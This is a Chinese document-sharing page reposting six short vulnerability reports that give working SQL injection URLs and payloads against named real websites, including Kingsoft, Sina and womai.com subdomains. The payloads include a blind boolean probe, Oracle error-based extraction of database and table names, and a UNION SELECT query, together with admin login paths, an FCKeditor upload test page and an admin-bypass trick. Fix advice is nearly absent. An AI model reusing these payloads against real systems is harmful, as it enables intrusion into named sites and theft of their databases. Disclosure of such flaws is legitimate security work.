金山某分站SQL注射+ROOT+后台

| 收藏本文 下载本文 作者:七侠镇潘头鱼

下面是小编收集整理的金山某分站SQL注射+ROOT+后台(共含6篇),仅供参考,希望能够帮助到大家。同时,但愿您也能像本文投稿人“七侠镇潘头鱼”一样,积极向本站投稿分享好文章。

金山某分站SQL注射+ROOT+后台

篇1:金山某分站SQL注射+ROOT+后台

注射点:

ask.xoyo.com/index.php?act=usercenter.messageinfo&messageid={id}%20and%20exists%28select%20password%20from%20system_user%29%23

可以查询mysql.user ,应该是root权限

盲注点,

金山某分站SQL注射+ROOT+后台

后台:

ask.xoyo.com/admin/index.php?act=login

还存在fckeditor,估计也存在上传漏洞。

ask.xoyo.com/admin/style/js/fckeditor/editor/filemanager/connectors/test.html

具体看下图

修复方案:应该懂得!

篇2:我买网某分站后台注入

首先是后台地址泄漏

tuan.womai.com/groupBuy/listOrderManage.jsp

后台登陆地址:

tuan.womai.com/login.jsp

登陆处存在 oracle 注入

tuan.womai.com/j_spring_security_check?j_password=a&j_username=admin' and 1=1--

tuan.womai.com/j_spring_security_check?j_password=a&j_username=admin' and 1=2--

根据反回的信息不同,存在注入,

查数据库名:

tuan.womai.com/j_spring_security_check?j_password=a&j_username=admin' or 1=utl_inaddr.get_host_address((select chr(126)||chr(39)||name||chr(39)||chr(126) from v$database where rownum=1)) and '1'='1

查表

tuan.womai.com/j_spring_security_check?j_password=a&j_username=admin' or 1=utl_inaddr.get_host_address((select chr(126)||chr(39)||TABLE_NAME||chr(39)||chr(126) from USER_TABLES where rownum=1)) and '1'='1

这里就不深入了,查出管理员用户密码进入管理后台,

或者直接是获取数据库同容了,危害应该比较大。

修复方案:

都懂得!

篇3:新浪某分站一处SQL注入

1. 下面这个搜索框存在注入,

2. 搜索框输入以下内容。

周杰伦' and 1=2 union select version,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56/*

3. 然后,数据库版本号就会出现在地址栏上,

4. 其它可获取的内容,就不一一列举了。

修复方案:

参数过滤

篇4:上海热线某频道SQL注射及修复

简要描述:上海热线某频道SQL注射

详细说明:train.online.sh.cn/Apply/applysubmit.aspx?classid=46760

存在SQL注射,数据库权限为sa,

上海热线某频道SQL注射及修复

因禁止远程查看应用程序错误的详细信息码故而把源码下载到本地分析,发现未过滤危险参数。可直接利用该注射获得服务器权限。

漏洞证明:

修复方案:包涵检测文件,过滤危险参数。

篇5:爱丽网SQL注射可登录后台

爱丽网子域名站SQL注射可登录后台

详细说明:主要是看到了:我是如何登录爱丽网后台的(非JS绕过、非盲打、非IP欺骗)!

看到的文章:/Article/04/83.html

进后台方法用Fiddler改返回数据包进入:

后进行测试,突发想到检测后台注入试试,然后得到后台存在注射漏洞

后台中302定向后继续显示内容的漏洞未补,造成别人可以进后台看数据

将注入点:

wed.27.cn/marry/marryadmin/web/store.php?method=getstoredetail&id=269

丢到胡萝卜中去,得到如下结果:

cmd5下可以破出来,但是貌似有乱码了

修复方案:

后台302跳转修补,过滤注射!!

篇6:金山网络个人中心POST SQL注射

i.ijinshan.com/register/verify

POSTDATA:

passport=88952634&is_mobile=1&code=88952634

修复方案:

那是金山呀,

金山网络个人中心POST SQL注射

。。

作者 z@cx

注射室年终总结

金山游记

金山作文500字

金山读书会作文

采购后台工作总结集

SQL实习总结

sql查询语句

儿科注射室工作体会

Discuz! trade.php 数据库注射 bug

返乡置业后台执行案

金山某分站SQL注射+ROOT+后台(精选6篇)

欢迎下载DOC格式的金山某分站SQL注射+ROOT+后台,但愿能给您带来参考作用!
推荐度: 推荐 推荐 推荐 推荐 推荐
点击下载文档 文档为doc格式
点击下载本文文档